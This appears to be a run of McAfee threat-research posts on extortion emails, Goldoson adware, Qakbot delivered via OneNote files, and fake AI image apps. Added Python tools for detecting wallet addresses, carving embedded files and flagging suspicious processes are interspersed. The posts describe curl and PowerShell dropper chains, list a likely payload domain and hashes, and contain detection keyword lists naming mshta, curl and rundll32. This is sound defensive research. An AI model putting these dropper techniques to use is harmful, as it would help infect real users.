Extortion emails are a type of scam where cybercriminals send threatening messages to individuals or organizations—demanding payment in exchange for not releasing sensitive or embarrassing information. These emails typically claim that the sender has compromising information, such as private photos or personal data, and threaten to share it with the recipient’s friends, family, or the public unless a payment is made. The payment is usually asked in the form of cryptocurrency, such as Bitcoin in the recent spam, which is difficult to trace and can be transferred quickly and anonymously. The goal of these emails is to scare the recipient into paying the demanded amount, even though there might not be any compromising information to release.
Scammers use different scare tactics, such as claims about bad internet browsing habits, Wi-Fi hacking, and network compromise through hardware vulnerabilities. We’ll now examine several illustrations of extortion emails and analyze the strategies scammers use to intimidate victims into paying. These real-life examples show how scammers use scareware tactics to manipulate and intimidate their victims into complying with their demands. By instilling fear, the scammers hope to provoke a sense of urgency in the victim, increasing the likelihood that they will pay the demanded ransom.
Figure 2 – Extortion fraud Example 1
Figure 2 is an illustration of a typical extortion email that scammers use to exploit their victims. In this instance, the scammer is claiming to have gained unauthorized access to the victim’s account through a security vulnerability in a Cisco router. The scammer is then threatening to expose embarrassing information about the victim unless a payment of $1,340 is made.
The payment is demanded through a Bitcoin wallet address that the scammer has provided. In this example, the scammer has obfuscated the Bitcoin wallet address by adding spaces between the characters, which is a tactic used to make it harder to track the payment. Now, let us examine another instance of extortion emails.
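The spaced-out wallet address described above is a cheap way to defeat a naive keyword filter, and it can be undone just as cheaply. The following is an added Python example (not from the McAfee post) for a mail filter: it finds legacy Bitcoin addresses in free text even when whitespace has been inserted between the characters, and verifies the Base58Check checksum so that ordinary words do not trigger it. The sample message is constructed; it uses the Bitcoin genesis-block address as a known-valid test value and a copy with its last character changed as a checksum-failure case.

```python
import hashlib
import re
from typing import Optional

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B58_CLASS = "[1-9A-HJ-NP-Za-km-z]"

# A legacy (P2PKH/P2SH) address starts with 1 or 3 and is 26-35 Base58 characters long;
# the \s* between characters tolerates the spacing trick described above.
SPACED_ADDRESS = re.compile(rf"(?<!{B58_CLASS})[13](?:\s*{B58_CLASS}){{25,34}}(?!{B58_CLASS})")

# Constructed extortion message modeled on the tactics described above (not the real email).
# First address: Bitcoin genesis-block address (known valid). Second: same address, last char altered.
SAMPLE_EMAIL = """\
I recorded your screen and camera through a flaw in your router.
Transfer exactly $1,340 to my wallet: 1A1zP 1eP5Q Gefi2 DMPTf TL5SL mv7Di vfNa
within 48 hours or the recordings go to all of your contacts.
Disregard the address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb from my earlier message.
"""


def b58check_decode(addr: str) -> Optional[bytes]:
    """Return the 21-byte payload (version + hash160) if the Base58Check checksum verifies, else None."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Each leading '1' encodes a leading zero byte that the integer conversion drops
    leading_zeros = len(addr) - len(addr.lstrip("1"))
    payload = b"\x00" * leading_zeros + body
    if len(payload) != 25:
        return None
    checksum = hashlib.sha256(hashlib.sha256(payload[:21]).digest()).digest()[:4]
    return payload[:21] if checksum == payload[21:] else None


def extract_wallet_addresses(text: str) -> list:
    """Find Bitcoin addresses in free text, undoing inserted whitespace and dropping checksum failures."""
    found = []
    for match in SPACED_ADDRESS.finditer(text):
        candidate = re.sub(r"\s+", "", match.group(0))
        # The greedy match may have absorbed a short following word; shrink until the checksum verifies
        for length in range(len(candidate), 25, -1):
            if b58check_decode(candidate[:length]) is not None:
                found.append(candidate[:length])
                break
    return found


if __name__ == "__main__":
    print(extract_wallet_addresses(SAMPLE_EMAIL))
```

The checksum step is what makes this usable at mail-gateway scale: a 34-character run of letters and digits is common in ordinary mail, but one that passes double-SHA-256 verification almost never is, so the extracted address can be fed straight into a blocklist or an abuse-database lookup like the one described later in the post.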
Figure 3 – Extortion fraud example 2
Figure 3 is another example of an extortion email that scammers use to trick and manipulate their victims. In this case, the attacker is claiming to have gained unauthorized access to the victim’s accounts and has deployed trojans and viruses on the victim’s system. The scammer is also blackmailing the victim by alleging that they have explicit adult content about the victim and the victim’s web browsing history. The purpose of this is to instill fear and provoke a sense of urgency in the victim.
Like the previous example, the scammer has provided a Bitcoin wallet address for the victim to make a ransom payment of $950. Additionally, the attacker has explained that the virus they’ve deployed is undetectable by antivirus software because they’ve used drivers that update the virus every few hours.
Cryptocurrency is the most common way these scammers ask for a ransom, because it is difficult to trace and can be moved quickly and anonymously between platforms. We noticed that the scammers were demanding ransom payments through Bitcoin wallets, so we gathered statistics on the number of unique Bitcoin wallets we came across in the past month.
Figure 4 – Unique Bitcoin Stats for 20th February 2023 – 23rd March 2023
We checked these Bitcoin addresses to see their transaction activity on the blockchain and their reputation in the Bitcoin abuse database. Below are some snapshots of the transactions of these addresses.
Figure 5 – Bitcoin received and abuse report count for a Bitcoin address
As illustrated in Figure 5, the Bitcoin addresses mentioned in these extortion emails have numerous abuse reports against them, and some ransom payments have been received through them. Our intelligence also tracked weekly trends in how much money these addresses received.
Figure 6 – Total Amount received (US Dollars) in that week
Figure 6 shows that the amount of money received in these Bitcoin addresses is increasing weekly. This implies that scammers are successfully extorting money from more consumers.
If you receive extortion emails, follow the steps outlined below.
Despite advancements in technology, extortion frauds continue to increase, as seen in this blog. The best defense against such scams is to remain calm and informed, and to make others aware of these frauds. By following the steps mentioned above, such as not responding to or paying any ransom demands, keeping your system and software updated, using strong passwords, and being wary of unusual emails or links, you can protect yourself from falling victim to these frauds. It is important to stay vigilant and to report any questionable activity to the appropriate authorities. By taking these precautions, you can help prevent yourself and others from becoming victims of extortion fraud.
The post Extortion Fraud is Still on the Rise appeared first on McAfee Blog.
Authored by SangRyol Ryu
McAfee’s Mobile Research Team discovered a software library we’ve named Goldoson, which collects lists of installed applications and a history of Wi-Fi and Bluetooth device information, including nearby GPS locations. Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user’s consent. The research team has found more than 60 applications containing this third-party malicious library, with more than 100 million downloads confirmed in the ONE store and Google Play app download markets in South Korea. While the malicious library was made by someone else, not the app developers, the risk to users who installed the apps remains.
McAfee Mobile Security detects this threat as Android/Goldoson and protects customers from this and many other mobile threats. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Google has reportedly notified the developers that their apps are in violation of Google Play policies and fixes are needed to reach compliance. Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices.
Top 9 applications previously infected by Goldoson on Google Play
The Goldoson library registers the device and fetches its remote configuration when the app runs. The library name and the remote server domain vary with each application, and both are obfuscated. The name Goldoson comes from the first domain name we found.
The remote configuration contains the parameters for each functionality and specifies how often each component runs. Based on these parameters, the library periodically checks for, pulls, and sends device information to the remote servers. Tags such as ‘ads_enable’ or ‘collect_enable’ switch each functionality on or off, while other parameters define conditions and availability.
A response of remote configuration
The library includes the ability to load web pages without user awareness. This functionality may be abused to load ads for financial profit. Technically, the library loads HTML code and injects it into a customized, hidden WebView, which then produces hidden traffic by visiting the URLs recursively.
Collected data is sent out periodically every two days but the cycle is subject to change by the remote configuration. The information contains some sensitive data including the list of installed applications, location history, MAC address of Bluetooth and Wi-Fi nearby, and more. This may allow individuals to be identified when the data is combined. The following tables show the data observed on our test device.
Google Play considers the list of installed apps to be personal and sensitive user data and requires a special permission declaration to get it. Users with Android 11 and above are more protected against apps attempting to gather all installed apps. However, even with the recent version of Android, we found that around 10% of the apps with Goldoson have the permission “QUERY_ALL_PACKAGES” that allows them to access app information.
Likewise, on Android 6.0 or higher, users may be asked for permissions such as Location, Storage, or Camera at runtime. If the user grants the location permission, the app can access not only GPS data but also information about nearby Wi-Fi and Bluetooth devices. Using the BSSID (Basic Service Set Identifier) and RSSI (Received Signal Strength Indicator), the application can determine the device’s location more accurately than with GPS alone, especially indoors.
A demo of runtime permission request
The infected applications come from various Android application stores. More than 100 million downloads have been tracked through Google Play. After that, ONE store, Korea’s leading app store, follows with about 8 million installations.
As applications continue to scale in size and leverage additional external libraries, it is important to understand their behavior. App developers should be upfront about libraries used and take precautions to protect users’ information. McAfee Mobile Security products can also help detect threats and protect you from not only malware but also unwanted programs. For more information, visit our McAfee Mobile Security.
Package Name | Application Name | GooglePlay Downloads | GP Status |
com.lottemembers.android | L.POINT with L.PAY | 10M+ | Updated* |
com.Monthly23.SwipeBrickBreaker | Swipe Brick Breaker | 10M+ | Removed** |
com.realbyteapps.moneymanagerfree | Money Manager Expense & Budget | 10M+ | Updated* |
com.skt.tmap.ku | TMAP – 대리,주차,전기차 충전,킥보 … | 10M+ | Updated* |
kr.co.lottecinema.lcm | 롯데시네마 | 10M+ | Updated* |
com.ktmusic.geniemusic | 지니뮤직 – genie | 10M+ | Updated* |
com.cultureland.ver2 | 컬쳐랜드[컬쳐캐쉬] | 5M+ | Updated* |
com.gretech.gomplayerko | GOM Player | 5M+ | Updated* |
com.megabox.mop | 메가박스(Megabox) | 5M+ | Removed** |
kr.co.psynet | LIVE Score, Real-Time Score | 5M+ | Updated* |
sixclk.newpiki | Pikicast | 5M+ | Removed** |
com.appsnine.compass | Compass 9: Smart Compass | 1M+ | Removed** |
com.gomtv.gomaudio | GOM Audio – Music, Sync lyrics | 1M+ | Updated* |
com.gretech.gomtv | 곰TV – All About Video | 1M+ | Updated* |
com.guninnuri.guninday | 전역일 계산기 디데이 곰신톡–군인 … | 1M+ | Updated* |
com.itemmania.imiapp | 아이템매니아 – 게임 아이템 거래 … | 1M+ | Removed** |
com.lotteworld.android.lottemagicpass | LOTTE WORLD Magicpass | 1M+ | Updated* |
com.Monthly23.BounceBrickBreaker | Bounce Brick Breaker | 1M+ | Removed** |
com.Monthly23.InfiniteSlice | Infinite Slice | 1M+ | Removed** |
com.pump.noraebang | 나홀로 노래방–쉽게 찾아 이용하는 … | 1M+ | Updated* |
com.somcloud.somnote | SomNote – Beautiful note app | 1M+ | Removed** |
com.whitecrow.metroid | Korea Subway Info : Metroid | 1M+ | Updated* |
kr.co.GoodTVBible | GOODTV다번역성경찬송 | 1M+ | Removed** |
kr.co.happymobile.happyscreen | 해피스크린 – 해피포인트를 모으 … | 1M+ | Updated* |
kr.co.rinasoft.howuse | UBhind: Mobile Tracker Manager | 1M+ | Removed** |
mafu.driving.free | 스피드 운전면허 필기시험 … | 1M+ | Removed** |
com.wtwoo.girlsinger.worldcup | 이상형 월드컵 | 500K+ | Updated* |
kr.ac.fspmobile.cu | CU편의점택배 | 500K+ | Removed** |
com.appsnine.audiorecorder | 스마트 녹음기 : 음성 녹음기 | 100K+ | Removed** |
com.camera.catmera | 캣메라 [순정 무음카메라] | 100K+ | Removed** |
com.cultureland.plus | 컬쳐플러스:컬쳐랜드 혜택 더하기 … | 100K+ | Updated* |
com.dkworks.simple_air | 창문닫아요(미세/초미세먼지/WHO … | 100K+ | Removed** |
com.lotteworld.ticket.seoulsky | 롯데월드타워 서울스카이 | 100K+ | Updated* |
com.Monthly23.LevelUpSnakeBall | Snake Ball Lover | 100K+ | Removed** |
com.nmp.playgeto | 게토(geto) – PC방 게이머 필수 앱 | 100K+ | Removed** |
com.note.app.memorymemo | 기억메모 – 심플해서 더 좋은 메모장 | 100K+ | Removed** |
com.player.pb.stream | 풀빵 : 광고 없는 유튜브 영상 … | 100K+ | Removed** |
com.realbyteapps.moneya | Money Manager (Remove Ads) | 100K+ | Updated* |
com.wishpoke.fanciticon | Inssaticon – Cute Emoticons, K | 100K+ | Removed** |
marifish.elder815.ecloud | 클라우드런처 | 100K+ | Updated* |
com.dtryx.scinema | 작은영화관 | 50K+ | Updated* |
com.kcld.ticketoffice | 매표소–뮤지컬문화공연 예매& … | 50K+ | Updated* |
com.lotteworld.ticket.aquarium | 롯데월드 아쿠아리움 | 50K+ | Updated* |
com.lotteworld.ticket.waterpark | 롯데 워터파크 | 50K+ | Updated* |
com.skt.skaf.l001mtm091 | T map for KT, LGU+ | 50K+ | Removed** |
org.howcompany.randomnumber | 숫자 뽑기 | 50K+ | Updated* |
com.aog.loader | 로더(Loader) – 효과음 다운로드 앱 | 10K+ | Removed** |
com.gomtv.gomaudio.pro | GOM Audio Plus – Music, Sync l | 10K+ | Updated* |
com.NineGames.SwipeBrickBreaker2 | Swipe Brick Breaker 2 | 10K+ | Removed** |
com.notice.safehome | 안심해 – 안심귀가 프로젝트 | 10K+ | Removed** |
kr.thepay.chuncheon | 불러봄내 – 춘천시민을 위한 공공 … | 10K+ | Removed** |
com.curation.fantaholic | 판타홀릭 – 아이돌 SNS 앱 | 5K+ | Removed** |
com.dtryx.cinecube | 씨네큐브 | 5K+ | Updated* |
com.p2e.tia.tnt | TNT | 5K+ | Removed** |
com.health.bestcare | 베스트케어–위험한 전자기장, … | 1K+ | Removed** |
com.ninegames.solitaire | InfinitySolitaire | 1K+ | Removed** |
com.notice.newsafe | 안심해 : 안심지도 | 1K+ | Removed** |
com.notii.cashnote | 노티아이 for 소상공인 | 1K+ | Removed** |
com.tdi.dataone | TDI News – 최초 데이터 뉴스 앱 … | 1K+ | Removed** |
com.ting.eyesting | 눈팅 – 여자들의 커뮤니티 | 500+ | Removed** |
com.ting.tingsearch | 팅서치 TingSearch | 50+ | Removed** |
com.celeb.tube.krieshachu | 츄스틱 : 크리샤츄 Fantastic | 50+ | Removed** |
com.player.yeonhagoogokka | 연하구곡 | 10+ | Removed** |
* Updated means that the recent application on Google Play does not contain the malicious library.
** Removed means the application is not available on Google Play as of the time of posting.
The post Goldoson: Privacy-invasive and Clicker Android Adware found in popular apps in South Korea appeared first on McAfee Blog.
Authored By Anandeshwar Unnikrishnan, Sakshi Jaiswal, Anuradha M
McAfee Labs has recently observed a new malware campaign that uses malicious OneNote documents to entice users to click on an embedded file, which downloads and executes the Qakbot trojan.
OneNote is a Microsoft digital notebook application that can be downloaded for free. It is a note-taking app that allows collaboration across organizations while enabling users to embed files and other artifacts. It is installed by default in Microsoft Office 2021 and Microsoft 365.
Malicious actors are always trying to find new ways to infect their victims, such as their shift to LNK files after Microsoft introduced a policy change that disabled Office macros by default. Because OneNote allows users to attach files to documents, OneNote documents make a good alternative to LNK files as a distribution vehicle for malware. This blog analyzes how OneNote documents are used maliciously and covers two specific campaigns that used OneNote documents to download and execute the Qakbot malware.
Figure 1 shows the geographic distribution of McAfee customers detecting malicious OneNote files.
Based on the telemetry from our endpoints we have identified the following threat families deployed through OneNote documents:
A holistic view of the phishing campaigns that weaponize OneNote documents is shown in Figure 2 below. The malicious document is delivered to the target in either a zip file or an ISO image through phishing emails. We have observed that most of the malicious documents contain either a Windows batch script that invokes PowerShell to drop the malware on the system, or a Visual Basic script that does the same.
The generic theme of the email is invoice- or legal-related, since these themes are more likely to be opened by the victim. An example email body and attachment are shown in Figures 3 and 4.
To understand how the data is laid out in the file, we need to examine it at the byte level. A close look at a OneNote document reveals that the magic bytes of its header are not a trivial signature. Figure 5 shows the first 16 bytes of the document binary.
The first 16 bytes need to be interpreted as the GUID value {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}. We can use the official OneNote specification to make sense of all the bytes and their structure. Figure 6 shows the header information taken from the OneNote specification document.
The Data Stream in OneNote, Say Hello To FileDataStoreObject
To find the embedded data in a OneNote document, we need to learn more about the FileDataStoreObject, which has the GUID value {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}. The structure that holds the data is shown below:
The FileData member of the FileDataStoreObject is the key member that holds the embedded data in the OneNote document. The size can be retrieved from the cbLength member.
Figure 7 shows the “on disk” representation of the FileDataStoreObject. This is taken from a malicious OneNote document used to spread the Qakbot payload. The guidHeader for the data object is highlighted in yellow and the data is shown in red. As is evident from the image, the data represents a text file, which is a script to launch PowerShell.
For more information on the OneNote specification, see the reference section.
Now that we have an idea of what the data object is, we can use this knowledge to automate the extraction of embedded artifacts from a OneNote document for further analysis, following the algorithm below.
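As an added example (not McAfee’s tooling), the following Python carver implements such an extraction using the file header GUID and the FileDataStoreObject described above. The sample document inside it is constructed for the illustration; the guidFooter GUID and the 4-byte unused and 8-byte reserved fields between cbLength and FileData are taken from the MS-ONESTORE specification rather than from this post.

```python
"""Carve embedded files (FileDataStoreObject payloads) out of a OneNote .one file."""
import struct
import sys
import uuid
from typing import List, NamedTuple

# GUIDs from the MS-ONESTORE specification. The two header GUIDs are the ones quoted
# in the text above; .bytes_le gives the little-endian byte order used on disk.
ONE_HEADER = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le  # guidFooter (spec)

# On-disk layout of FileDataStoreObject:
#   guidHeader(16) | cbLength(8, LE) | unused(4) | reserved(8) | FileData(cbLength) | guidFooter(16)
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8

# Markers that flag a text payload as a script, i.e. the artifact an analyst wants to see first.
SCRIPT_MARKERS = (b"@echo", b"powershell", b"mshta", b"cmd.exe", b"<script",
                  b"wscript", b"rundll32", b"curl ")


class Embedded(NamedTuple):
    offset: int      # file offset of guidHeader
    length: int      # cbLength as stored in the object
    kind: str        # coarse type guess, or "truncated"
    footer_ok: bool  # guidFooter found immediately after FileData
    data: bytes


def classify(data: bytes) -> str:
    """Coarse type guess from the first bytes of an embedded payload."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith((b"\x89PNG", b"\xff\xd8\xff")):
        return "image"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return "binary"
    return "script" if any(m in data.lower() for m in SCRIPT_MARKERS) else "text"


def is_onenote(blob: bytes) -> bool:
    """True if the blob starts with the .one file header GUID."""
    return blob[:16] == ONE_HEADER


def carve(blob: bytes) -> List[Embedded]:
    """Return every FileDataStoreObject in blob, in file order.

    An object whose cbLength runs past the end of the file is reported as
    "truncated" with whatever bytes remain, rather than silently dropped.
    """
    found: List[Embedded] = []
    pos = blob.find(FDSO_HEADER)
    while pos != -1:
        if pos + 24 > len(blob):          # not even room for cbLength
            break
        length = struct.unpack_from("<Q", blob, pos + 16)[0]
        start = pos + FDSO_DATA_OFFSET
        end = start + length
        if end > len(blob):
            found.append(Embedded(pos, length, "truncated", False, blob[start:]))
            pos = blob.find(FDSO_HEADER, pos + 16)
            continue
        data = blob[start:end]
        footer_ok = blob[end:end + 16] == FDSO_FOOTER
        found.append(Embedded(pos, length, classify(data), footer_ok, data))
        pos = blob.find(FDSO_HEADER, end)
    return found


# Constructed sample (not a real document): header GUID, filler, two embedded objects.
def _fdso(payload: bytes) -> bytes:
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + bytes(4) + bytes(8) + payload + FDSO_FOOTER


SAMPLE_SCRIPT = b"@echo off\r\nwhoami\r\n"        # same harmless content as the test document above
SAMPLE_IMAGE = b"\x89PNG\r\n\x1a\n" + bytes(16)    # PNG signature plus padding
CONSTRUCTED_ONE = (ONE_HEADER + bytes(48) + _fdso(SAMPLE_IMAGE)
                   + bytes(24) + _fdso(SAMPLE_SCRIPT) + bytes(8))
CONSTRUCTED_TRUNCATED = ONE_HEADER + _fdso(SAMPLE_SCRIPT)[:-20]   # FileData cut short

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else CONSTRUCTED_ONE
    print("OneNote header:", "yes" if is_onenote(blob) else "no")
    for item in carve(blob):
        print(f"offset=0x{item.offset:x} cbLength={item.length} "
              f"kind={item.kind} footer_ok={item.footer_ok}")
        if item.kind == "script":
            print(item.data.decode("utf-8", "replace"))
```

Run it against a real .one sample to list the embedded objects; a payload classified as "script" is the dropper to analyze next.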
Looking at the runtime characteristics of OneNote Desktop application we have observed that when an embedded file gets executed by the user, it is stored temporarily in the OneNote directory in the User’s Temp location. Each directory with GUID values represents a different document opened in the OneNote application.
By analyzing numerous malicious documents, we have been able to create a “test” OneNote document that executes a batch file containing the “whoami” command. Figure 9 shows the batch file being created in the user’s temp location.
This section contains specific details on a Qakbot campaign. In campaign 1, the malware author used phishing emails to deliver the malicious OneNote document, either as an attachment or as a URL linking to a zip file containing the OneNote document. The OneNote document contained an HTA file that, once executed, used the curl utility to download Qakbot and then execute it.
The OneNote file with the embedded HTA file is shown in Figure 11. Once this OneNote file is opened, it prompts the user with a fake message to double-click on Open to view the attachment.
Upon clicking the Open button, it drops the HTA file with the name Open.hta to the %temp% Folder and executes it using mshta.exe.
The HTA file contains an obfuscated script, as shown below:
The HTA file is loaded by MSHTA and creates a registry key under HKEY_CURRENT_USER\SOFTWARE\ with obfuscated content, as shown below:
The de-obfuscated content of the HTA file is shown below:
Figure 18 shows the process tree of Qakbot:
Type | Value | Product | Detected |
Campaign 1 – OneNote File | 88c24db6c7513f47496d2e4b81331af60a70cf8fb491540424d2a0be0b62f5ea | Total Protection and LiveSafe | VBS/Qakbot.a |
Campaign 1 – HTA File | e85f2b92c0c2de054af2147505320e0ce955f08a2ff411a34dce69c28b11b4e4 | Total Protection and LiveSafe | VBS/Qakbot.b |
Campaign 1 – DLL File | 15789B9b6f09ab7a498eebbe7c63b21a6a64356c20b7921e11e01cd7b1b495e3 | Total Protection and LiveSafe | Qakbot-FMZ |
The OneNote document for campaign 2 is shown in Figure 19. At first glance, it appears that there is an ‘Open’ button embedded within the document. The message above the ‘Open’ button instructs the user to “double click” in order to receive the attachment.
A closer look at the document reveals that the graphical elements are all images placed in layers by the malicious actor. By moving the icons aside, we can see the malicious batch file, which when executed downloads the payload from the Internet and executes it on the target system.
Execution Of Payload Dropper
Upon execution of the batch file, PowerShell is invoked to fetch the Qakbot payload from the Internet and execute it on the target system. This section covers the details of the dropper script used to deploy Qakbot. Figure 21 shows the process tree after the execution of the script: powershell.exe was launched by cmd.exe, and the parent of cmd.exe is onenote.exe.
The contents of process cmd.exe (7176) are shown below.
The base64-decoded batch file is shown in Figure 23. It uses PowerShell to download the payload and then executes it with rundll32.exe.
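As an added example (not part of the original post), the following Python snippet turns the parent-child relationship from Figure 21 into a detection rule run over process-creation events. The events, pids, paths and command lines are constructed for the illustration, not taken from the campaign telemetry.

```python
"""Flag script interpreters spawned beneath OneNote in process-creation telemetry."""
from typing import Dict, List, NamedTuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str     # executable name, lower-case
    cmdline: str


# Interpreters and download utilities that appear in the chains described above.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                       "cscript.exe", "rundll32.exe", "curl.exe"}
ONENOTE = "onenote.exe"
MAX_DEPTH = 8  # how far up the tree to walk before giving up


def find_onenote_spawns(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per suspicious process that has onenote.exe as an ancestor.

    Each finding carries the pid, the image, the depth below OneNote (1 = direct
    child), the ancestry chain, and whether the command line references the user's
    Temp folder, where OneNote writes embedded files before launching them.
    """
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.image not in SUSPICIOUS_CHILDREN:
            continue
        chain = [e.image]
        cur = e
        for depth in range(1, MAX_DEPTH + 1):
            parent = by_pid.get(cur.ppid)
            if parent is None:          # parent exited or was never logged
                break
            chain.append(parent.image)
            if parent.image == ONENOTE:
                low = e.cmdline.lower()
                findings.append({
                    "pid": e.pid,
                    "image": e.image,
                    "depth": depth,
                    "chain": " <- ".join(chain),
                    "temp_path": "%temp%" in low or "\\temp\\" in low,
                })
                break
            cur = parent
    return findings


# Constructed events: OneNote opens a document whose embedded batch file starts
# cmd.exe -> powershell.exe (as in campaign 2) and whose HTA is run by mshta.exe from
# the Temp folder (as in campaign 1); the last two rows are a benign admin shell.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(4200, 1000, ONENOTE, 'onenote.exe "C:\\Users\\victim\\Downloads\\invoice.one"'),
    ProcEvent(7176, 4200, "cmd.exe",
              'cmd.exe /c "C:\\Users\\victim\\AppData\\Local\\Temp\\OneNote\\invoice.bat"'),
    ProcEvent(7300, 7176, "powershell.exe", "powershell.exe -enc <base64 omitted>"),
    ProcEvent(7412, 4200, "mshta.exe",
              'mshta.exe "C:\\Users\\victim\\AppData\\Local\\Temp\\Open.hta"'),
    ProcEvent(9000, 1000, "cmd.exe", "cmd.exe"),
    ProcEvent(9001, 9000, "powershell.exe", "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for finding in find_onenote_spawns(SAMPLE_EVENTS):
        print(finding)
```

The benign explorer.exe -> cmd.exe -> powershell.exe chain produces no finding, which is what keeps this rule usable on an endpoint where PowerShell is used legitimately.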
Type | Value | Product | Detected |
Campaign 2 – Zip File | 000fb3799a741d80156c512c792ce09b9c4fbd8db108d63f3fdb0194c122e2a1 | Total Protection and LiveSafe | VBS/Qakbot.a |
Campaign 2 – OneNote File | 2bbfc13c80c7c6e77478ec38d499447288adc78a2e4b3f8da6223db9e3ac2d75 | Total Protection and LiveSafe | One/Downloader.a |
Campaign 2 – Powershell File | b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424 | Total Protection and LiveSafe | PS/Agent.gs |
Campaign 2 – OneNote File | a870d31caea7f6925f41b581b98c35b162738034d5d86c0c27c5a8d78404e860 | Total Protection and LiveSafe | VBS/Qakbot.a |
starcomputadoras.com
Malware authors are getting more sophisticated when it comes to hiding their payloads. This blog highlights a recent Qakbot campaign that uses the OneNote application as the delivery mechanism for its payload. McAfee customers should keep their systems up to date and refrain from clicking links and opening attachments in suspicious emails to stay protected.
The post The Rising Trend of OneNote Documents for Malware delivery appeared first on McAfee Blog.
Authored by Fernando Ruiz
The popularity of AI-based mobile applications that can create artistic images based on pictures, such as the “Magic Avatars” from Lensa, and of the OpenAI service DALL-E 2, which generates them from text, has increased mainstream interest in these tools. Users should be aware of those seeking to take advantage of this interest to distribute Potentially Unwanted Programs (PUPs) or malware, such as through deceptive applications that promise the same or similar advanced features but are just basic image editors or otherwise repackaged apps that can drain your data plan and battery life with Clicker and HiddenAds behaviors, subscribe you to expensive services that provide little or no value over alternatives (Fleeceware), or even steal your social media account credentials (FaceStealer).
Dozens of apps surface daily claiming to offer AI image creation. Some of them might be legitimate or based on open-source projects such as Stable Diffusion, but in the search for a free application that produces quality results, users might try new apps that could compromise their privacy, user experience, wallet and/or security.
The McAfee Mobile Research Team recently discovered a series of repackaged image editors on the Google Play app store which presented concerning behaviors. McAfee Mobile Security products help protect against such apps, including those classified as Android/FakeApp, Android/FaceStealer, Android/PUP.Repacked and Android/PUP.GenericAdware.
McAfee, a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem, reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play.
We now discuss various types of privacy and/or security risks associated with the types of apps recently removed from the app store.
“Pista – Cartoon Photo Effect” and “NewProfilePicture” are examples of apps that offered compelling visual results; however, each was based on the same image editor with basic filters and trojanized with Android/FaceStealer, a well-known malware family capable of compromising a victim’s Facebook or Instagram account. The apps could capture user credentials during a Facebook login by embedding a JavaScript function, loaded from a remote server to evade detection, into a Flutter WebView activity that displays the Facebook login screen.
“NewProfilePicture” and “Pista – Cartoon Photo Effect” are examples of FaceStealer malware that posed as a cartoon avatar creator.
The same image editor which was repackaged into the above two apps has also been repackaged alternatively with adware modules and distributed by other developers under other app names, such as “Cartoon Effect | Cartoon Photo”:
Fleeceware refers to mobile apps that use various tactics to enroll users into subscriptions with high fees, typically after a free trial period, and often with little or no value to the subscriber beyond cheaper or free alternatives. If the user does not take care to cancel their subscription, they continue to be charged even after deleting the app.
“Toonify Me”, which is no longer available on the Play Store, cost $49.99 per week after a 3-day trial (almost $2,600 per year) for what its app description presented as AI-generated illustrations, but it was another repackaged version of the same image editor functionality found within “NewProfilePicture” and “Pista – Cartoon Photo Effect”.
In this case, the “Toonify Me” app did not allow feature access without enrolling in the subscription, and the “CONTINUE” button which initiated the subscription was the only option to tap in the app once it was launched.
Promoted by ads that described it as capable of transforming pictures into artistic drawings, the “Fun Coloring – Paint by Number” app is an example of a repackaged version of a different, legitimate pixel painting app. It lacked the advertised AI effects and was plagued with adware-like behavior.
Advertisement of “Fun Coloring – Paint by Number” on social media which included app store link
Consistent with the many reviews complaining about unexpected ads unrelated to the app, once installed the app started a service that communicated in the background with the Facebook Graph API every 5 seconds and could pull ads based on received commands after some time of execution. The app contained multiple injected SDK modules from AppsFlyer, Fyber, InMobi, IAB, Mintegral, PubNative and Smaato (none of which are in the original app, which was repackaged to include them), which would help monetize installations without regard for user experience.
When new types of apps become popular and new ones appear on the market offering similar features, users should act with caution to avoid becoming victims of those wanting to exploit public interest.
When installing an app that causes you doubt, make sure you:
Even if an app is legitimate, we also encourage users to look closely before installation at any available privacy policy to understand how personal data will be treated. Your face is a biometric identifier that’s not easy to change, and multiple pictures might be needed (and stored) to create your model.
Artificial intelligence tools will continue to amaze us with their capabilities and probably will become more accessible and safer to use over time. For now, keep in mind that AI technology is still limited and experimental, and can be expensive to use – always consider any hidden costs. AI also will bring more challenges as we discussed on the 2023 McAfee Threat Prediction blog.
The following table lists the application package name, hash sum SHA256, the minimum number of installations on Google Play, and the type of detected threat. These apps were removed from Google Play, but some may remain available elsewhere.
Package Name | SHA256 | Installs | Type |
com.ayogamez.sketchcartoon | 9cb1d996643fbec26bb9878939735221dfbf639075ceea3abdb94e0982c494c1 | 5M | Adware |
